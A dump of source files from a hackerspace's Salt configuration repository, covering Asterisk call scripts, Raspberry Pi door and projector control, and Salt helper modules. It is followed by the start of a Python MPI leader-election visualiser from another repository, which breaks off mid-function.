else:\n print(\"handle_request: Not caching request for {0}, it was invalid ({1})\".format(item, res))\n return str(res)\n\ndef update():\n start_io()\n init_intervals()\n while True:\n do_update()\n\nupdater = threading.Thread(target=update, name=\"ClimateUpdater\")\nupdater.setDaemon(True)\nupdater.start()\n \napp = flask.Flask(__name__)\n\n@app.route('/<name>', methods=['GET', 'POST'])\ndef serve(name):\n if name in ACTIONS:\n args = flask.request.args\n return handle_request(name, **args)\n else:\n return \"Page not found\", 404\n\napp.run('::', port=PORT, debug=False)\n" }, { "alpha_fraction": 0.4756944477558136, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 31, "blob_id": "fa14ee4616ad747a2326c50adb643e6997a03cb3", "content_id": "d14bddf142a9ee06109afd048681a5a18be2c5f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 288, "license_type": "no_license", "max_line_length": 139, "num_lines": 9, "path": "/asterisk/scripts/callerid", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nSTOPTIME=\"$(($(date '+%s') + 60))\"\n\necho \"$$\" >> /tmp/callerid\n\nwhile [ -f /tmp/callerid -a \"$(date '+%s')\" -lt \"$STOPTIME\" ]; do\n /usr/bin/send-text -h 10.1.253.237 -f /usr/share/flaschen-taschen/fonts/10x20.bdf -g 512x20+0+6+1 -b ff0000 -s 20 -O \"Call From: $1 $2\"\ndone\n" }, { "alpha_fraction": 0.618625283241272, "alphanum_fraction": 0.6407982110977173, "avg_line_length": 24.05555534362793, "blob_id": "b3c8fd86f619bf1643eb4d9aab5ea00cca3653d6", "content_id": "e84c78802693a992ee9b3a83948b1da59f53cab7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 451, "license_type": "no_license", "max_line_length": 82, "num_lines": 18, "path": "/asterisk/scripts/astcall-listen", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport sys\nimport time\nimport subprocess\nCALL_EXEC = \"channel originate SIP/intercom-{} extension 468@bridge_listen_entry\"\nDESTS = ['garage', 'den', 'den2', 'mark']\n\nsrc = sys.argv[1].lower()\n\ndest = None\nif len(sys.argv) > 2:\n dest = sys.argv[2].lower()\n\nprocs = []\nfor n in DESTS:\n if n not in src and n in dest:\n subprocess.Popen(['/usr/bin/asterisk', '-rx', CALL_EXEC.format(n)]).wait()\n time.sleep(.05)\n" }, { "alpha_fraction": 0.5302557945251465, "alphanum_fraction": 0.531503438949585, "avg_line_length": 26.169490814208984, "blob_id": "ccaf1dae975bee298e2fe8c4d545e6b481638ba8", "content_id": "6ab7efe0dff2ae62abb382262a1c7ca7dabcab8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1603, "license_type": "no_license", "max_line_length": 88, "num_lines": 59, "path": "/_modules/dns.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nimport socket\n\ndef is_listdict(d):\n return isinstance(d, list) and all((isinstance(n, dict) and len(n) == 1 for n in d))\n\ndef resolve(hostname):\n return socket.gethostbyname(hostname)\n\ndef merge_listdict(a, b):\n \"merges b into a\"\n\n a_dict = {}\n b_dict = {}\n\n for elm in a:\n a_dict.update(elm)\n\n for elm in b:\n b_dict.update(elm)\n\n res_dict = merge(a_dict, b_dict)\n\n return [{k: v} for k, v in res_dict.items()]\n\ndef merge(a, b, path=None):\n \"merges b into a\"\n if path is None: path = []\n\n if is_listdict(a) and is_listdict(b):\n return merge_listdict(a, b)\n else:\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n merge(a[key], b[key], path + [str(key)])\n elif a[key] == b[key]:\n pass # same leaf value\n else:\n a[key] = b[key]\n else:\n a[key] = b[key]\n return a\n\ndef static_resolve(host):\n if host == 'localhost':\n return host\n\n defaults = __salt__['pillar.get'](\"dns:defaults\", {})\n \n for name, network in __salt__['pillar.get'](\"dns:networks\", {}).items():\n network = merge(deepcopy(defaults), network)\n domain = network['options']['domain-name']\n if host.endswith('.' + domain):\n unqualified_host = host[:-len(domain)-1]\n if unqualified_host in network.get('hosts', {}):\n return network['hosts'][unqualified_host].get('ip', host)\n\n return host\n" }, { "alpha_fraction": 0.6226415038108826, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 20.200000762939453, "blob_id": "ec999c5828b17fe13e026e393ee6ac8e7f5b0810", "content_id": "f427574010df0288a00682468428656b86125c6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 106, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/asterisk/scripts/callerid-stop", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ -f /tmp/callerid ]; then\n cat /tmp/callerid | xargs kill -INT && rm /tmp/callerid\nfi\n" }, { "alpha_fraction": 0.5387840867042542, "alphanum_fraction": 0.5870020985603333, "avg_line_length": 18.079999923706055, "blob_id": "433c3673356b40218393b44ff3e917c113bd848e", "content_id": "d60c18034a7cd424b63c4819febb338d835b12fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 477, "license_type": "no_license", "max_line_length": 118, "num_lines": 25, "path": "/asterisk/scripts/make-call", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nif [ \"$#\" -lt 3 ]; then\n echo \"Usage: $0 <extension> <command> <data> [wait]\"\n exit 1\nfi\n\necho \"$0 $1 $2 $3\"\n\nif [ -z \"$4\" ]; then\n WAIT=0\nelse\n WAIT=\"$4\"\nfi\n\n{\n sleep $WAIT\n cat <<EOF | sed \"s%_DEST_%$1%\" | sed \"s%_COMMAND_%$2%\" | sed \"s%_DATA_%$3%\" > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/_DEST_\nApplication: _COMMAND_\nData: _DATA_\nSetVar: CHANNEL(language)=en\nSetVar: CALLERID(num)=2408982516\nSetVar: CALLERID(name)=Hackafe\nEOF\n} &\n" }, { "alpha_fraction": 0.5993537902832031, "alphanum_fraction": 0.6009693145751953, "avg_line_length": 24.79166603088379, "blob_id": "8348411ccd4422b11b18311cb9a5d047e9355417", "content_id": "027f78b337ea8a6566ab0aad36c28cc62f029452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 619, "license_type": "no_license", "max_line_length": 69, "num_lines": 24, "path": "/_modules/hackafe.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "import sys, subprocess\n\ndef espeak(*words):\n exitcode = subprocess.call([\"espeak\", ' '.join(words)])\n if exitcode == 0:\n return True\n else:\n return False\n\ndef stats():\n temperaturestrs = __salt__['mine.get']('*', 'sensor.temperature')\n print(temperaturestrs)\n temperatures = []\n for tempstr in temperaturestrs:\n try:\n temperatures.append(float(tempstr))\n except ValueError:\n print(\"Could not convert: '%s'\" % tempstr)\n\n if temperatures:\n avgtemp = sum(temperatures)/len(temperatures)\n else:\n avgtemp = None\n return [avgtemp]\n" }, { "alpha_fraction": 0.6257225275039673, "alphanum_fraction": 0.6416184902191162, "avg_line_length": 26.68000030517578, "blob_id": "03c980ed08d187aca3b08142f5aa2be4d8a3226b", "content_id": "1d9bbd7b846245e31bf5f6ea7a73049548f50468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 692, "license_type": "no_license", "max_line_length": 65, "num_lines": 25, "path": "/_modules/sensor.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "import subprocess\n\ndef _read_temp(pin=24):\n \"\"\"Return (humidity, temperature) from the temp binary.\"\"\"\n try:\n output = subprocess.check_output([\"temp\", str(pin)])\n except subprocess.CalledProcessError as e:\n if e.returncode == 127: # command not found\n return None\n else:\n raise e\n\n humidity, temperature = map(float, output.split(' '))\n if humidity == 0 and temperature == 0: # bad read from sensor\n return None\n\n return humidity, temperature\n\ndef temperature(pin=24):\n humidity, temperature = _read_temp(pin)\n return temperature\n\ndef humidity(pin=24):\n humidity, temperature = _read_temp(pin)\n return humidity\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5243902206420898, "avg_line_length": 15.399999618530273, "blob_id": "ec81e0c397ca175ef2d170327c6d26dea615fbe4", "content_id": "0e3ebb7710205e13c37e9b2b88dd007f28166c1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 82, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/asterisk/scripts/callerid-start", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ ! -f /tmp/callerid ]; then\n /usr/bin/callerid \"$1\" \"$2\" &\nfi\n" }, { "alpha_fraction": 0.5541958212852478, "alphanum_fraction": 0.6241258978843689, "avg_line_length": 21.8799991607666, "blob_id": "f6ed5239d3433bbd5c95269349e38e33bb599d57", "content_id": "0f36a62b2cb794021a3a7c9d5e514ac8310139a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 49, "num_lines": 25, "path": "/homeautomation/projector.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport RPi.GPIO as gpio\nimport time\nimport sys\n\ngpio.setmode(gpio.BOARD)\ngpio.setup(11, gpio.OUT, initial=1)\ngpio.setup(15, gpio.OUT, initial=1)\n\nif len(sys.argv) > 1 and sys.argv[1] == \"up\":\n gpio.output(11, 0)\n time.sleep(.1)\n gpio.output(11, 1)\nelif len(sys.argv) > 1 and sys.argv[1] == \"down\":\n gpio.output(15, 0)\n time.sleep(.1)\n gpio.output(15, 1)\nelif len(sys.argv) > 1 and sys.argv[1] == \"stop\":\n gpio.output(11, 0)\n gpio.output(15, 0)\n time.sleep(.1)\n gpio.output(11, 1)\n gpio.output(15, 1)\n\ngpio.cleanup()\n" }, { "alpha_fraction": 0.7886932492256165, "alphanum_fraction": 0.7886932492256165, "avg_line_length": 38.96296310424805, "blob_id": "fe79ee9ddb6db73332d8c232fefb976d855c2996", "content_id": "c0bb95c823b134a0d64b596929ce1a722cf644b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 100, "num_lines": 27, "path": "/README.md", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "# Salt Configuration\n\nThis repository contains Salt configuration and rules for Hackafé. If you don't know exactly what\nthat is, please don't modify this.\n\nThe Salt master reads this repository from `/var/git/saltmaster`, which is itself can be pushed to\nfrom developer copies. This is done using Salt's `fileserver_backend: git` feature.\n\n# Provisioning\n\nThe idea motivating most of this project is to make reconfiguring and configuring from scratch\nsystems. For example, we find ourselves frequently wiping and re-provisioning Raspberry Pi's and\nother systems. In particular, we can standardize access, passwords, keys, and services such as Salt,\nand home automation helpers.\n\n## Management\n\nIt can be handy to include 'meta' rules which ensure that services such as `salt-minion` are\nproperly enabled and running. This is provided by the `managed` formula.\n\n## Users, Passwords, and Keys\n\nUsers are created and managed by the `users` formula.\n\nPasswords do not yet have a solution.\n\nKeys are dropped into place via the fileserver and are provided also by the `users` formula.\n" }, { "alpha_fraction": 0.6536585092544556, "alphanum_fraction": 0.707317054271698, "avg_line_length": 17.636363983154297, "blob_id": "7567fe08d162e08c6c73f70c33275b7f407a85fc", "content_id": "445563c5491a5979a97680b4a8e8af61cc831d90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 205, "license_type": "no_license", "max_line_length": 52, "num_lines": 11, "path": "/asterisk/scripts/downtimecall", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n{\n cat <<EOF > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/voipo/*\nCallerID: \"Hackafe\" <2408982516>\nContext: downtime\nExtension: start\nPriority: 1\nSetVar: CHANNEL(language)=en\nEOF\n} &\n" }, { "alpha_fraction": 0.6126126050949097, "alphanum_fraction": 0.6126126050949097, "avg_line_length": 54.5, "blob_id": "30ff43250ff23e189530df293a02ae7e9b6a9806", "content_id": "875cf7d51ba2b187572003c1764974f04451ed86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 111, "license_type": "no_license", "max_line_length": 98, "num_lines": 2, "path": "/isumbcopen/updater_wrapper", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nOUT=$(/usr/local/bin/updater.py) && echo \"$OUT\" | tr '\\n' ' ' > /srv/http/isumbcopen.com/state.txt\n" }, { "alpha_fraction": 0.4699943959712982, "alphanum_fraction": 0.49467191100120544, "avg_line_length": 30.280702590942383, "blob_id": "5df2413ffa4c00a6df848d6a346cdb97c7d1d5b6", "content_id": "8b1ba46231a7f411a8412a9c227c3f58e169de9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 76, "num_lines": 57, "path": "/asterisk/scripts/pizza", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nORDER=\"$2\"\n\nfunction get_nth_pizza() {\n grep 'PIZZA;' \"/tmp/pizza_${ORDER}\" | head -n $1 | tail -n 1\n}\n\nif [[ \"$1\" == \"add-topping\" ]]; then\n SIDE=\"$3\"\n NAME=\"$4\"\n\n if [[ \"$SIDE\" != \"both\" ]]; then\n\techo -n \"${NAME} on the ${SIDE} side,\" >> \"/tmp/pizza_${ORDER}\"\n else\n\techo -n \"${NAME},\" >> \"/tmp/pizza_${ORDER}\"\n fi\nelif [[ \"$1\" == \"add-pizza\" ]]; then\n SIZE=\"$3\"\n echo -en \"\\nPIZZA;${SIZE}; \" >> \"/tmp/pizza_${ORDER}\"\nelif [[ \"$1\" == \"set-payment\" ]]; then\n METHOD=\"$3\"\n echo -en \"\\nPAYMENT;$3\" >> \"/tmp/pizza_${ORDER}\"\n if [[ \"$METHOD\" == \"credit card\" ]]; then\n\techo -en \"\\nCARD;4100 0000 0000 0005\" >> \"/tmp/pizza_${ORDER}\"\n fi\nelif [[ \"$1\" == \"set-delivery\" ]]; then\n echo -en \"\\nDELIVERY;$3\" >> \"/tmp/pizza_${ORDER}\"\nelif [[ \"$1\" == \"set-tip\" ]]; then\n TIP=\"$3\"\n if [[ \"$TIP\" != \"cash\" ]]; then\n\tTIP=\"$TIP dollars\"\n fi\n echo -en \"\\nTIP;$TIP\" >> \"/tmp/pizza_${ORDER}\"\nelif [[ \"$1\" == \"pizza-count\" ]]; then\n grep 'PIZZA;' \"/tmp/pizza_${ORDER}\" | wc -l\nelif [[ \"$1\" == \"pizza-size\" ]]; then\n get_nth_pizza $3 | awk -F ';' '{print $2}'\nelif [[ \"$1\" == \"pizza-toppings\" ]]; then\n get_nth_pizza $3 | awk -F ';' '{print $3}'\nelif [[ \"$1\" == \"payment-method\" ]]; then\n METHOD=$(grep 'PAYMENT' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}')\n TYPE=$(grep 'DELIVERY' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}')\n TIP=$(grep 'TIP' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}')\n TIP=\"${TIP} dollars\"\n if [[ \"$METHOD\" == \"credit\" ]]; then\n\tif [[ \"$TYPE\" == \"delivery\" ]]; then\n\t echo \"${METHOD} with a tip of ${TIP}\"\n\telse\n\t echo ${METHOD}\n\tfi\n else\n\techo ${METHOD}\n fi\nelif [[ \"$1\" == \"order-type\" ]]; then\n grep 'DELIVERY' \"/tmp/pizza_${ORDER}\" | awk -F ';' '{print $2}'\nfi\n" }, { "alpha_fraction": 0.6307692527770996, "alphanum_fraction": 0.6692307591438293, "avg_line_length": 42.33333206176758, "blob_id": "a6d5e232daf3c9f012a2e7e8db5f585f2dc76a45", "content_id": "c34f04ec3f8224bc419ff37ef4a6c84fbefa20f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 130, "license_type": "no_license", "max_line_length": 62, "num_lines": 3, "path": "/asterisk/scripts/wakeupcall", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# usage is wakeupcall <extension> <song> <hour> <minute>\necho \"make-call-context $1 wakeup-target 1 SONG $2\" | at $3:$4\n" }, { "alpha_fraction": 0.5618892312049866, "alphanum_fraction": 0.6221498250961304, "avg_line_length": 23.559999465942383, "blob_id": "5d64c52871ecea4f17e7696d877f4e5f43f95945", "content_id": "a8147151b0d9c495a11c56b10f0fb379921ef0dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 614, "license_type": "no_license", "max_line_length": 50, "num_lines": 25, "path": "/homeautomation/door.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport RPi.GPIO as gpio\nimport time\nimport sys\n\ngpio.setmode(gpio.BOARD)\ngpio.setup(12, gpio.OUT, initial=1)\ngpio.setup(13, gpio.IN, pull_up_down=gpio.PUD_UP)\n\nif len(sys.argv) > 1 and sys.argv[1] == \"trigger\":\n gpio.output(12, 0)\n time.sleep(.1)\n gpio.output(12, 1)\nelif len(sys.argv) > 1 and sys.argv[1] == \"close\":\n while gpio.input(13) != 0:\n gpio.output(12, 0)\n time.sleep(.1)\n gpio.output(12, 1)\n time.sleep(15)\nelif len(sys.argv) > 1 and sys.argv[1] == \"get\":\n time.sleep(0.1)\n\nprint(\"False\" if gpio.input(13) else \"True\")\n\ngpio.cleanup(12)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 21.636363983154297, "blob_id": "242eb8a2a08cd5fa6072af67e7b27375522880ac", "content_id": "d5961174e6feb2eab4d0a7c8ab07948f667062fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 249, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/Makefile", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "TEST_PILLAR_ROOT := pillar\nTEST_LOG_FILE := /dev/null\nTEST_CONFIG_DIR := testing/\n\n.PHONY: test\n\ntest:\n\tsalt-call --local --pillar-root ${TEST_PILLAR_ROOT} \\\n\t\t--log-file ${TEST_LOG_FILE} \\\n\t\t--config-dir=${TEST_CONFIG_DIR} \\\n\t\tstate.show_highstate\n" }, { "alpha_fraction": 0.6235294342041016, "alphanum_fraction": 0.6882352828979492, "avg_line_length": 20.25, "blob_id": "eaad203ec0fcc1976666d20df30a4602d185a1bc", "content_id": "4160de9d58df6f10208f3751b1ad5f884b3d4434", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/asterisk/scripts/eight.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport random\nimport sign\nimport os\n\ndisplay = sign.Sign(\"dash\", 8800)\n\ndisplay.new_message(\"8 8 8 8\", name=\"eight\", lifetime=1, priority=1)\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 16.5, "blob_id": "75f66ca02d6964e5e1c6efeea32d13efb16ad848", "content_id": "1989845aa20ff9435385d892e32aa9f5b7f63107", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 105, "license_type": "no_license", "max_line_length": 48, "num_lines": 6, "path": "/router/reload.sh", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/vbash\nsource /opt/vyatta/etc/functions/script-template\n\nconfigure\nload /config/config.boot\ncommit\n" }, { "alpha_fraction": 0.541961133480072, "alphanum_fraction": 0.5618374347686768, "avg_line_length": 23.879121780395508, "blob_id": "a77181b265b29ee20770691cdf13be4297d6b139", "content_id": "cb7431a1ea6ef49076f3a467f4387e401490ce06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "no_license", "max_line_length": 135, "num_lines": 91, "path": "/_modules/utils.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "from itertools import izip\nfrom copy import deepcopy\nimport re\nimport hashlib\n\ndef dict_to_dictlist(d):\n return [{k: v} for k, v in d.items()]\n\ndef dictlist_to_dict(l):\n res = {}\n for d in l:\n if len(d) != 1:\n raise ValueError(\"Not a dictlist!\")\n for k, v in d.items():\n res[k] = v\n return res\n\nNET_REMAP = {'ip': 'ip_address'}\ndef remap(k):\n if k in NET_REMAP:\n return NET_REMAP[k]\n return k\n\nNET_PARAMS = ['name', 'bridge', 'gw', 'ip', 'type', 'ip6', 'hwaddr', 'tag', 'model', 'macaddr']\nKEEP_ANYWAY = ['name', 'ip']\n\ndef filter_netparams(param_dictlist):\n return [{remap(k): v} for d in param_dictlist for k, v in d.items() if k not in NET_PARAMS or k in KEEP_ANYWAY]\n\ndef mknet(name='eth0', bridge='vmbr0', gw=None, ip=None, type='veth', **kwargs):\n if ip and '/' not in ip:\n ip += '/24'\n\n if gw:\n kwargs['gw'] = gw\n\n if ip and kwargs.get('technology') != 'qemu':\n kwargs['ip'] = ip\n\n kwargs.update({\n 'name': name,\n 'bridge': bridge,\n 'type': type\n })\n\n if kwargs.get('technology') == 'qemu':\n if 'name' in kwargs:\n del kwargs['name']\n\n del kwargs['type']\n\n model = kwargs.get('model', 'virtio')\n\n if 'hwaddr' in kwargs:\n kwargs['macaddr'] = kwargs['hwaddr']\n kwargs[model] = kwargs['hwaddr']\n del kwargs['hwaddr']\n\n return ','.join(['='.join((k,str(v))) for k, v in kwargs.items() if k in NET_PARAMS])\n\ndef is_list(obj):\n return isinstance(obj, list)\n\ndef is_dict(obj):\n return isinstance(obj, dict)\n\ndef is_ip(obj):\n return is_str(obj) and re.match('^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$', obj)\n\ndef is_str(obj):\n return isinstance(obj, str)\n\ndef is_int(obj):\n return isinstance(obj, int)\n\ndef grouped(iterable, n):\n return izip(*[iter(iterable)]*n)\n\ndef pairwise(l):\n return grouped(l, 2)\n\ndef exclude_keys(dic, *keys):\n return {k: v for k, v in dic.iteritems() if k not in keys}\n\ndef copy(dic):\n return deepcopy(dic)\n\ndef gen_mac(hostname):\n raw = '02' + hashlib.sha256(hostname).hexdigest().lower()[-10:]\n mac = ':'.join((a+b for a,b in pairwise(raw)))\n return mac\n" }, { "alpha_fraction": 0.5513513684272766, "alphanum_fraction": 0.5765765905380249, "avg_line_length": 20.346153259277344, "blob_id": "cba6d408a55227e76303feef9aad5ceec2ed3d9a", "content_id": "eb484bdafaff9c0de0eb1b6f87a5b0219b747ebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 555, "license_type": "no_license", "max_line_length": 174, "num_lines": 26, "path": "/asterisk/scripts/make-call-context", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nif [ \"$#\" -lt 3 ]; then\n echo \"Usage: $0 <destination> <context> <extension> [varname] [varval]\"\n exit 1\nfi\n\necho \"$0 $1 $2 $3\"\n\nif [ -z \"$4\" ]; then\n VAR=\"HACKAFENOOP\"\n VAL=\"NONE\"\nelse\n VAR=\"$4\"\n VAL=\"$5\"\nfi\n\n{\n cat <<EOF | sed \"s/_DEST_/$1/\" | sed \"s%_CONTEXT_%$2%\" | sed \"s%_EXTENSION_%$3%\" | sed \"s%_VARNAME_%$VAR%\" | sed \"s%_VARVAL_%$VAL%\" > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/_DEST_\nContext: _CONTEXT_\nExtension: _EXTENSION_\nPriority: 1\nSetVar: CHANNEL(language)=en\nSetVar: _VARNAME_=_VARVAL_\nEOF\n} &\n" } ]
29
Parean/sk_tel
https://github.com/Parean/sk_tel
d5ad132c22d3a0bd3db56c768568c78132ad7f9c
fde49a3325bb075a6f319be3618b434adf6b8263
8109d7e9779b97f6dbb9423b36b6550e24bbf095
refs/heads/master
2022-04-27T11:43:06.562977
2020-04-22T13:59:22
2020-04-22T14:11:58
257,479,351
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5297253727912903, "alphanum_fraction": 0.5397415161132812, "avg_line_length": 24.566524505615234, "blob_id": "b4d61b0e14a510542a9b62d113abf66a518d161e", "content_id": "d16473fccfd8d6d5848f48a1efe8b605fae84053", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6190, "license_type": "no_license", "max_line_length": 169, "num_lines": 233, "path": "/network.py", "repo_name": "Parean/sk_tel", "src_encoding": "UTF-8", "text": "import math\r\nimport os\r\nimport sys\r\nfrom enum import Enum\r\nfrom itertools import tee\r\nfrom random import sample\r\n\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom mpi4py import MPI\r\n\r\n\r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\nnumber_of_communicators = comm.Get_size() - 1\r\n\r\nALGORITHM_TAG = 1\r\nDRAWING_TAG = 2\r\nDELAY_TIME = 0.5\r\n\r\n\r\nclass State(Enum):\r\n active = 1\r\n passive = 2\r\n leader = 3\r\n loser = 4\r\n\r\n\r\nclass Error(Enum):\r\n invalid_number_of_arguments = \"invalid number of arguments \\nformat of command: mpiexec -n {num_of_processes} python network.py [random | from_file {/path/to/file}]\"\r\n invalid_number_of_communicators = \"invalid number of communicators\"\r\n invalid_mode = \"invalid mode \\nmode must be either random or from_file\"\r\n file_not_found = \"input file doesn't exist\"\r\n ci_is_not_an_int = \"%s is not an int\"\r\n ci_duplication = \"%s is already exists in the network\"\r\n\r\n\r\ndef pairwise(iterable):\r\n a, b = tee(iterable)\r\n next(b, None)\r\n\r\n return zip(a, b)\r\n\r\n\r\ndef generate_edges(vxs):\r\n edges = [(v1,v2) for v1, v2 in pairwise(vxs)]\r\n edges.append((vxs[number_of_communicators - 1], vxs[0]))\r\n \r\n return edges\r\n\r\n\r\ndef finish(msg, *args):\r\n print(msg.value % args, flush=True)\r\n comm.Abort()\r\n exit(1)\r\n\r\n\r\ndef get_pos(vxs):\r\n pos = {}\r\n radius = 20\r\n \r\n for i, v in enumerate(vxs):\r\n arc = 2 * math.pi * i / len(vxs)\r\n x = math.sin(arc) * radius\r\n y = math.cos(arc) * radius\r\n pos[v] = (x, y)\r\n\r\n return pos\r\n\r\n\r\ndef draw_network(vxs, pos, node_colors, labels):\r\n plt.clf()\r\n\r\n network = nx.DiGraph()\r\n network.add_edges_from(generate_edges(vxs))\r\n\r\n nx.draw_networkx_nodes(network, pos, node_color=node_colors, node_size=500)\r\n nx.draw_networkx_labels(network, pos, labels=labels)\r\n nx.draw_networkx_edges(network, pos)\r\n\r\n plt.draw()\r\n plt.pause(DELAY_TIME)\r\n\r\n\r\ndef dst(rank, number_of_communicators):\r\n if rank == number_of_communicators:\r\n return 1\r\n\r\n return rank + 1\r\n\r\n\r\ndef src(rank, number_of_communicators):\r\n if rank == 1:\r\n return number_of_communicators\r\n\r\n return rank - 1\r\n\r\n\r\ndef send_data_to_drawer(data):\r\n comm.send(data, dest=0, tag=DRAWING_TAG)\r\n\r\n\r\ndef send(next_node, algo_data, state_data):\r\n comm.send(algo_data, dest=next_node, tag=ALGORITHM_TAG)\r\n send_data_to_drawer(state_data)\r\n\r\n\r\ndef get_vxs(argv):\r\n vxs = []\r\n\r\n if len(argv) < 1:\r\n finish(Error.invalid_number_of_arguments)\r\n \r\n if argv[0] == 'from_file':\r\n if len(argv) != 2:\r\n finish(Error.invalid_number_of_arguments)\r\n \r\n if not os.path.exists(argv[1]):\r\n finish(Error.file_not_found)\r\n \r\n for line in open(argv[1]):\r\n if not line[:-1].isdecimal():\r\n finish(Error.ci_is_not_an_int, line[:-1])\r\n \r\n ci = int(line)\r\n if ci in vxs:\r\n finish(Error.ci_duplication, ci)\r\n \r\n vxs.append(ci)\r\n \r\n if len(vxs) != number_of_communicators:\r\n finish(Error.invalid_number_of_communicators)\r\n elif argv[0] == 'random':\r\n if len(argv) != 1:\r\n finish(Error.invalid_number_of_arguments)\r\n \r\n vxs = sample(range(1, 100), number_of_communicators)\r\n else:\r\n finish(Error.invalid_mode)\r\n\r\n return vxs\r\n\r\n\r\ndef drawer_worker(argv):\r\n vxs = get_vxs(argv)\r\n comm.bcast(vxs, root=0)\r\n \r\n passive_node_color = (0.9, 0, 0)\r\n active_node_color = (1, 1, 0.7)\r\n node_colors = [active_node_color for v in vxs]\r\n pos = get_pos(vxs)\r\n \r\n labels = {v: v for v in vxs}\r\n is_running = number_of_communicators > 1\r\n \r\n while is_running:\r\n draw_network(vxs, pos, node_colors, labels)\r\n \r\n for i, v in enumerate(vxs):\r\n src_communicator = i + 1\r\n data = comm.recv(source=src_communicator, tag=DRAWING_TAG)\r\n \r\n if 'need_stop' in data:\r\n is_running = False\r\n else:\r\n assert 'state' in data\r\n assert 'ci' in data\r\n \r\n if data['state'] == State.passive:\r\n node_colors[i] = passive_node_color\r\n labels[v] = data['ci']\r\n \r\n draw_network(vxs, pos, node_colors, labels)\r\n plt.show()\r\n \r\n\r\ndef communicator_worker():\r\n prev_node = src(rank, number_of_communicators)\r\n next_node = dst(rank, number_of_communicators)\r\n acn = -1\r\n\r\n vxs = comm.bcast(None, root=0)\r\n \r\n win = -1 if number_of_communicators > 1 